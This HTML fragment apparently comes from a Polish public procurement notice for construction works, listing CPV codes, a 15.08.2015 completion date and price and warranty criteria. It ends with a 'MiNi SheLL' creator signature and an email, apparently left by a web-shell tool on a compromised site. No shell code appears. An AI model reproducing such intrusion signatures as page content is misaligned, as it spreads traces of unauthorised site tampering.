<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com